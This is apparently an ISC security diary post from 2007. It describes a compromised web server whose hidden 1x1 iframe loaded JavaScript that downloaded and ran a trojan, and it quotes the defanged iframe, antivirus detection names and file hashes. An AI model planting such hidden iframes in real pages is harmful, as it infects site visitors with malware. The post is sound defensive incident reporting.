Iframe > malicious javascript > trojan

Another iframe on a compromised server pointing to javascript which then downloads malware. Jeff wrote in to tell us about a web server that had an iframe like this:

<bo dy><i frame src='hxxp:// index.php' width='1' height='1' style='visibility: hidden;'></i frame>

The unencode javascript at index.php then downloaded and ran hxxp:// file.php , a binary PE trojan.

Here is what virstotal had to say about file.php:

AntiVir 06.05.2007 TR/Small.MI.25
AVG 06.05.2007 Generic4.SJO
BitDefender 7.2 06.05.2007 Trojan.Agent.AXB
DrWeb 4.33 06.05.2007 Trojan.DownLoader.23162
eSafe 06.05.2007 Win32.Small.mi
eTrust-Vet 30.7.3693 06.05.2007 Win32/Chepvil!generic
Ewido 4.0 06.05.2007 Trojan.Small.mi
F-Secure 6.70.13030.0 06.05.2007 Trojan.Win32.Small.mi
Ikarus T3.1.1.8 06.05.2007 Trojan.Win32.Small.mi
Kaspersky 06.05.2007 Trojan.Win32.Small.mi
Microsoft 1.2503 06.05.2007 TrojanDownloader:Win32/Agent!EF3C
Norman 5.80.02 06.05.2007 W32/Smalltroj.BHMK
Prevx1 V2 06.05.2007 Polynomial.Code.Exploit
Sophos 4.18.0 06.01.2007 Mal/Clagger-E
TheHacker 06.04.2007 Trojan/Small.mi
VirusBuster 4.3.23:9 06.05.2007 no virus found
Webwasher-Gateway 6.0.1 06.05.2007 Trojan.Small.MI.25

Aditional Information
File size: 6767 bytes
MD5: 3cefdebc529c408c8ba9ef20a0b6291c
SHA1: 4d3599829828e90f6e27b886c9ee403163fc91f6
Prevx info: http://fileinfo.prevx.com/fileinfo.asp?PXC=e09499856113

The server has since had the iframe removed. The owner was a little less than gracious when we spoke this morning. He was aware that it was compromised and infecting web users. If you are notified that a system you run or own is involved in an incident please take action as soon as you can.

Adrien de Beaupre

353 Posts
ISC Handler
Jun 5th 2007

Sign Up for Free or Log In to start participating in the conversation!